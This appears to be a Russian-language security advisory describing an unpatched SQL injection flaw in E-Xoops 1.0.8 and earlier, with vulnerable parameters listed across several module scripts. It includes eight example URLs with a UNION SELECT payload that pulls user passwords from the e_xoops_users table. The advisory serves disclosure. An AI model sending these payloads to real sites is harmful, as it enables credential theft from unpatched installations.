SQL-инъекция в E-Xoops

Дата публикации:
31.12.2007
Дата изменения:
10.04.2009
Всего просмотров:
2461
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
e-Xoops 1.x
Уязвимые версии: E-Xoops (exoops) 1.0.8 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "lid" в сценариях /modules/mylinks/ratelink.php, /modules/adresses/ratefile.php, /modules/mydownloads/ratefile.php, /modules/mysections/ratefile.php и /modules/myalbum/ratephoto.php, в параметре "bid" в сценарии /modules/banners/click.php, и в параметре "gid" в сценарии /modules/arcade/index.php, когда параметр act установлен в значение show_stats или play_game. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[host]/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201
http://[host]/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201
http://[host]/modules/mydownloads/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201
http://[host]/modules/mysections/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201
http://[host]/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201
http://[host]/modules/banners/click.php?bid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201
http://[host]/modules/arcade/index.php?act=show_stats&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201
http://[host]/modules/arcade/index.php?act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

URL производителя: phpxref.com/xref/exoops/nav.html

Решение: Способов устранения уязвимости не существует в настоящее время.

или введите имя

CAPTCHA